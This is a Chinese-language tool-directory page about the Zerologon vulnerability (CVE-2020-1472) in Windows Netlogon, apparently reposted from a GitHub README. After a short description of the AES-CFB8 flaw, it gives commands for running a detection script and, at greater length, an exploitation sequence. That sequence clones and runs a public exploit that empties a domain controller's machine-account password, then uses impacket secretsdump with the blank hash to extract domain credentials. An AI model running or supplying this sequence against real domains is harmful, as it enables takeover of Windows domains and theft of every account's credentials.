Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-1472 — [CVE-2020-1472] Netlogon 远程协议调用 (MS-NRPC) 权限提升 (Zerologon) | Kitploit
工具/GitHubGitHub/murataydemir/cve-2020-1472
权限提升漏洞分析漏洞利用渗透测试身份验证红队
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Netlogon 远程协议调用 (MS-NRPC) 权限提升 (Zerologon)

查看仓库
1235年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

[CVE-2020-1472] Netlogon远程协议调用(MS-NRPC)权限提升(Zerologon)

此处描述的攻击利用了一个密码学认证协议(不安全地使用了AES-CFB8)的缺陷,该协议用于向域控制器(DC)证明加入域的计算机的真实性和身份。由于错误地使用了一种AES操作模式,攻击者可以伪造任何计算机账户(包括DC自身的账户)的身份,并在域中为该账户设置空密码(只需发送一系列Netlogon消息,其中各个字段填充为零)。随后可利用这一点获取域管理员凭据,然后恢复原始的DC密码。

用于检测CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (示例: ./zerologon_tester.py DC01 172.16.208.161)

用于利用CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (示例: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

然后,运行以下命令之一

示例格式1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
示例格式2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Image of PoC

原始博客文章可在此处获取
包含Python测试脚本的原始仓库可在此处获取
包含Python利用脚本的原始仓库可在此处获取

下载工具